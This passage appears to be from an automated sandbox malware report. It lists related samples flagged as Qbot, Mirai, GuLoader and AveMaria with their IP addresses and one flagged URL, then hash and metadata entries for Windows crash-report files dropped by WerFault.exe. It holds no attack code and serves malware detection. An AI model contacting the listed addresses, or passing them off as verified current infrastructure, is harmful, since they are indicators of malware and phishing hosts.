                                                                                                                                                                                                                                                                      qbot1.dllGet hashmaliciousQbotBrowse
                                                                                                                                                                                                                                                                      • 2.82.8.80
                                                                                                                                                                                                                                                                      distantly.dat.dllGet hashmaliciousQbotBrowse
                                                                                                                                                                                                                                                                      • 2.82.8.80
                                                                                                                                                                                                                                                                      qbot1.dllGet hashmaliciousQbotBrowse
                                                                                                                                                                                                                                                                      • 2.82.8.80
                                                                                                                                                                                                                                                                      oOo.dat.dllGet hashmaliciousQbotBrowse
                                                                                                                                                                                                                                                                      • 2.82.8.80
                                                                                                                                                                                                                                                                      4FvxWvpyEa.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                      • 85.244.76.113
                                                                                                                                                                                                                                                                      photographed.dat.dllGet hashmaliciousQbotBrowse
                                                                                                                                                                                                                                                                      • 2.82.8.80
                                                                                                                                                                                                                                                                      db0fa4b8db0333367e9bda3ab68b8042.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                      • 2.80.41.222
                                                                                                                                                                                                                                                                      F086.dllGet hashmaliciousQbotBrowse
                                                                                                                                                                                                                                                                      • 2.82.8.80
                                                                                                                                                                                                                                                                      COGENT-174USCkTj3s6mWH.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                                                                                      • 38.192.171.72
                                                                                                                                                                                                                                                                      xnJk6GdoRN.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                                                                                      • 38.118.59.100
                                                                                                                                                                                                                                                                      BFAT7hL1iq.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                      • 149.110.96.130
                                                                                                                                                                                                                                                                      050_qbot.dllGet hashmaliciousQbotBrowse
                                                                                                                                                                                                                                                                      • 38.2.18.164
                                                                                                                                                                                                                                                                      051_qbot.dll.dllGet hashmaliciousQbotBrowse
                                                                                                                                                                                                                                                                      • 38.2.18.164
                                                                                                                                                                                                                                                                      050_qbot.dllGet hashmaliciousQbotBrowse
                                                                                                                                                                                                                                                                      • 38.2.18.164
                                                                                                                                                                                                                                                                      qXW7G51t86.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                      • 38.15.249.222
                                                                                                                                                                                                                                                                      https://1uvb4gp37m-teamsharpoin2-sbs.translate.goog/?_x_tr_sch=http&_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-US&_x_tr_pto=wappGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                      • 38.34.185.163
                                                                                                                                                                                                                                                                      file.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                                                                                      • 38.59.83.97
                                                                                                                                                                                                                                                                      278857944198_#U53d1#U7968_(2).exeGet hashmaliciousAveMaria, UACMeBrowse
                                                                                                                                                                                                                                                                      • 50.7.90.50
                                                                                                                                                                                                                                                                      AgULhRm1jv.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                      • 154.30.85.67
                                                                                                                                                                                                                                                                      naMIV4vu9Y.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                      • 38.223.141.61
                                                                                                                                                                                                                                                                      766X0ABLoy.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                      • 38.7.5.5
                                                                                                                                                                                                                                                                      b9LW1UgHuq.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                      • 38.211.154.4
                                                                                                                                                                                                                                                                      rrRj18GAAe.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                      • 38.230.105.74
                                                                                                                                                                                                                                                                      Astra.x86.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                                                                                                                                                      • 154.60.6.224
                                                                                                                                                                                                                                                                      OLM8Aa9n3h.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                      • 154.7.198.78
                                                                                                                                                                                                                                                                      sora.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                      • 149.33.222.173
                                                                                                                                                                                                                                                                      No context
                                                                                                                                                                                                                                                                      No context
                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                                                                                                                      Entropy (8bit):0.9069485680359128
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:M91zi40oX1HBUZMX4jed+F/u7suS274ItWc:Gzi+XlBUZMX4jew/u7suX4ItWc
                                                                                                                                                                                                                                                                      MD5:3DAF0239E931D9A9F550949CD411F8D9
                                                                                                                                                                                                                                                                      SHA1:D5852A94D39502D72A1881CFCAF5B0A65B91AC14
                                                                                                                                                                                                                                                                      SHA-256:8B4AD29DDE48A460FD413CEC88AD7E48A9DCD1906BFAD0F4F3277FB794BF0B76
                                                                                                                                                                                                                                                                      SHA-512:50BEC91B7AA356819B0B155F00EA442A6380AE1571D137B3FAB4765880C93FCF78BABAFB36203791C035A7C23231343E86EC2C5D0265DCC76517A5510E56D8FD
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.3.0.5.9.8.6.7.8.8.0.7.2.4.5.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.3.0.5.9.8.6.8.0.2.1.3.4.7.1.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.d.d.8.6.2.4.3.-.5.9.8.f.-.4.4.1.f.-.9.5.c.2.-.a.9.f.3.5.8.4.8.9.4.9.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.5.2.e.4.8.e.7.-.6.0.0.9.-.4.4.4.0.-.8.1.a.8.-.e.b.f.d.1.4.9.6.7.5.b.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.4.5.4.-.0.0.0.1.-.0.0.1.f.-.0.3.6.c.-.f.f.b.3.1.6.9.9.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.
                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                                                                                                                      Entropy (8bit):0.9070882023503786
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:LdjiW0oXAHBUZMX4jed+F/u7suS274ItWc:JjiQXoBUZMX4jew/u7suX4ItWc
                                                                                                                                                                                                                                                                      MD5:25A03C50219D78A6BE8F5CE36230564E
                                                                                                                                                                                                                                                                      SHA1:132FFA36671673DC8F23B471590C4B6131631A01
                                                                                                                                                                                                                                                                      SHA-256:77DCEAF8822B7A02CC6B4CF9EEF14D0CB8FB68EE82C101FF88709288FE897FE3
                                                                                                                                                                                                                                                                      SHA-512:DAD99802459F5A5D97610818112D25B4C656E66731AD1ED25D08577DFB9136517682EE6562E5F7FD390C00CF0679C0DCC5F578AFEAF42E207C9CE18F3B625CC9
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.3.0.5.9.8.6.8.7.3.9.0.4.5.3.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.3.0.5.9.8.6.8.8.8.2.7.9.5.4.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.8.6.5.8.7.7.f.-.e.8.4.b.-.4.1.7.6.-.8.8.1.0.-.4.1.f.2.6.8.5.7.c.2.e.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.f.7.d.b.d.9.f.-.6.7.c.0.-.4.9.9.a.-.8.e.f.6.-.b.5.0.7.3.b.4.e.0.3.8.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.8.8.-.0.0.0.1.-.0.0.1.f.-.d.8.a.6.-.7.0.b.9.1.6.9.9.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.
                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                                                                                                                      Entropy (8bit):0.9069577957202795
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:ym8liM0oXxHBUZMX4jed+F/u7suS274ItWc:yiKXBBUZMX4jew/u7suX4ItWc
                                                                                                                                                                                                                                                                      MD5:F811A2CCEA345F8E70F17CC93E088492
                                                                                                                                                                                                                                                                      SHA1:DA9C9159572AEFF9176EE8A4AC35F1E4F2220312
                                                                                                                                                                                                                                                                      SHA-256:F7A3F5135AE1B818003DA0AE800D004C6215BEF2932506283C8FAE9F6CD7F5EE
                                                                                                                                                                                                                                                                      SHA-512:21CBA1B52A440E5ACED92AEC372B590DF15467E5FF0FDAAA2543FFA264E6D9CA7485DFB58C4FE9C01AA0FED7CD740929B3AF4279BDDA8E899627BF84B8126BE5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.3.0.5.9.8.6.7.8.7.9.7.9.1.5.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.3.0.5.9.8.6.8.0.2.0.4.1.4.2.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.b.c.f.7.b.d.8.-.8.6.c.3.-.4.a.2.6.-.8.8.e.2.-.8.9.e.c.b.3.6.4.7.3.b.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.8.c.9.a.f.8.6.-.2.6.7.b.-.4.1.6.7.-.8.3.4.3.-.a.0.8.2.b.5.2.8.a.4.3.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.3.c.-.0.0.0.1.-.0.0.1.f.-.c.1.1.4.-.f.b.b.3.1.6.9.9.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.
                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                                                                                                                      Entropy (8bit):0.9068743082243313
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:iFDia0oXyHBUZMX4jed+F/u7suS274ItWc:cDiMXKBUZMX4jew/u7suX4ItWc
                                                                                                                                                                                                                                                                      MD5:2305E45971941A8220077AB904406D3F
                                                                                                                                                                                                                                                                      SHA1:4B96C618B06FE4D1B42DD8C53BFF53D46B9E64D4
                                                                                                                                                                                                                                                                      SHA-256:BB8ECFFE8C881794CAE3736A648E3C9171321F203A9D46995DE4E19740FE6BB6
                                                                                                                                                                                                                                                                      SHA-512:C76F9CEB12E0FF693C02BFE2BDA990F87FA6185BC553B6E36F56E3B938CB06C350BF1B89076280813EEABA6E72E05A355C2CC533E960BA28522245FCFFFD7B9B
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.3.0.5.9.8.6.8.7.4.0.7.2.9.9.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.3.0.5.9.8.6.8.8.8.6.0.4.1.4.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.5.2.3.3.8.0.7.-.3.c.b.2.-.4.d.5.0.-.8.7.4.0.-.0.c.3.9.2.5.2.4.c.9.3.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.6.5.1.e.e.d.4.-.6.d.2.d.-.4.8.d.5.-.8.6.2.e.-.b.3.9.1.f.6.2.5.c.d.1.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.6.a.4.-.0.0.0.1.-.0.0.1.f.-.3.c.8.0.-.8.9.b.9.1.6.9.9.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.
                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                      File Type:Mini DuMP crash report, 14 streams, Wed Jun 7 08:04:39 2023, 0x1205a4 type
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):44234
                                                                                                                                                                                                                                                                      Entropy (8bit):2.1083789692518344
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:IvAwn0q4O5SkbS9SwizPUgmNQpKCXgXTZZ2Ha:m0o5LbS9GQNQZXW+a
                                                                                                                                                                                                                                                                      MD5:4F0217F82F1EB1CC660097F6093AB784
                                                                                                                                                                                                                                                                      SHA1:A4C7FB4F3F5F45FDCCE2BCBC538837B7FF2D6C9A
                                                                                                                                                                                                                                                                      SHA-256:8FDAA51A6815D700ED46B7892B4D6601FB88367B5547A5EEDAB89F248271D1B9
                                                                                                                                                                                                                                                                      SHA-512:64E5DF41AEACBF44032A4D207DB9B8060A4C2961225BFA7F3E51728A43043388F927F91EE28D789B01A0A6D93D5948FF93B074CD674AE2981E57AAF83E68A234
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:MDMP....... ........:.d.........................................,..........T.......8...........T..........................0................................................................................U...........B..............GenuineIntelW...........T.......<....:.d.............................0..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                      File Type:Mini DuMP crash report, 14 streams, Wed Jun 7 08:04:39 2023, 0x1205a4 type
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):46090
                                                                                                                                                                                                                                                                      Entropy (8bit):2.049290592546687
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:IxIuwn2coO5Skby2Rs9PA1uZ5FP5MS7v4BG8IzOKTnR4:j225Lby822uzFykMIyKTR
                                                                                                                                                                                                                                                                      MD5:7CE958E3FCCC091A1C14215C35D246A7
                                                                                                                                                                                                                                                                      SHA1:47A4A263F0617483B7C45C3BAC77B890EC21583A
                                                                                                                                                                                                                                                                      SHA-256:7F45F3ED8E88D4B9E75E144905BB56EBB4C5859454CFC618E0289CB274959023
                                                                                                                                                                                                                                                                      SHA-512:88C5216BE0F78178BD46406E8F7A57AE20EC8DAFD462896839528875B433116662FA63ACDFFB338FC77151398150B5336EBB131FF43DD4B68BD97B3E3F397F02
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:MDMP....... ........:.d.........................................,..........T.......8...........T...........P...............0................................................................................U...........B..............GenuineIntelW...........T.......T....:.d.............................0..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):8248
                                                                                                                                                                                                                                                                      Entropy (8bit):3.6919259351458082
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:Rrl7r3GLNiZs6u6YaF6fgmfTrS/H9Cprg89b+xsf/OKm:RrlsNii6u6YY6fgmfTrSI+qfS
                                                                                                                                                                                                                                                                      MD5:1FE30ABE2C4425EBA9707BFC879BB363
                                                                                                                                                                                                                                                                      SHA1:2146AA5B580E9D2F46813DD6737A162F143549AD
                                                                                                                                                                                                                                                                      SHA-256:E0839BA1B1E41BC42F352D283A510777B4CC0F04AC8DCA2F434689B5B4AB5FDE
                                                                                                                                                                                                                                                                      SHA-512:5D81953C64B58076C7C64D69759BC57E7EA6D9A3568A70B7D81BC2415637178AEE455D3B101DDF250FF51802F3DA8B76B42382ECC2B331D409BEDAEF088FCB63
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.4.3.6.<./.P.i.d.>.......
                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):8244
                                                                                                                                                                                                                                                                      Entropy (8bit):3.6911056195314447
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:Rrl7r3GLNi9d6z6YeK6hgmfTTS/H9Cprp89b+ssf0HEKm:RrlsNi36z6YD6hgmfTTSD+/fh
                                                                                                                                                                                                                                                                      MD5:F466D95D274A391A69D7BF4404A5A30C
                                                                                                                                                                                                                                                                      SHA1:383B3675B370BD56B6BBA81B0F72FDC4B62C8EBF
                                                                                                                                                                                                                                                                      SHA-256:2958E9EF97BA799EDA179F2340637DBEEB08CEF7742AAA909D060EC2BEDD4528
                                                                                                                                                                                                                                                                      SHA-512:FD1B9E3D0AFF7FBFAAF182680EF43A43C6F217B8F9EBEF5707983111A20FE82F18BE1B3720A22B6ADD07FF13CF867A4F56FDEE1F733DE77F876297AB2EF7180D
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.1.0.8.<./.P.i.d.>.......
                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):4630
                                                                                                                                                                                                                                                                      Entropy (8bit):4.450581457310216
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:48:cvIwSD8zszJgtWI9AOWgc8sqYjj8fm8M4JCdsdFKE+q8/MQ4SrSid:uITfNTvgrsqYcJsEoDWid
                                                                                                                                                                                                                                                                      MD5:CB12336BACD233D023852954771FF71B
                                                                                                                                                                                                                                                                      SHA1:CEC8B867E8CC278DDBCC2BF81917A5705559C77D
                                                                                                                                                                                                                                                                      SHA-256:8767761B226A47C42A5A51EAAAB8B8CBB4381E02716F1F5FF609420A36C19C01
                                                                                                                                                                                                                                                                      SHA-512:85DEBCA74D559D39A24B8723F314046B16A2DB3F9E425C9C2F793BF0848545179184BFF99E8D963E3290873CDB88A13D1A02005E0D778A54B44E7E99470A6FEA
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="2074635" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):4630
                                                                                                                                                                                                                                                                      Entropy (8bit):4.452196030168851
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:48:cvIwSD8zszJgtWI9AOWgc8sqYjea8fm8M4JCdspF9RlSJ+q8/MA4SrS1d:uITfNTvgrsqYSvJZlSJIDW1d
                                                                                                                                                                                                                                                                      MD5:5835CA99C84AE44D846427D8D149F56E
                                                                                                                                                                                                                                                                      SHA1:34706F73738EA66E54409305461B3B0083CDC5D5
                                                                                                                                                                                                                                                                      SHA-256:2C986D702C0A23602B2D1CE777183E57BF2E1B0D993A2BD455F084F16DDD11BB
                                                                                                                                                                                                                                                                      SHA-512:8F7E6E8EDAFE548F4997848CC7306C8E323F822DF293C0BFC56BBC0B57A20F7715874207980DED1C65F7F872EBD6C05E5C070D415883A93C4C062F14E0549A16
                                                                                                                                                                                                                                                                      Malicious:false
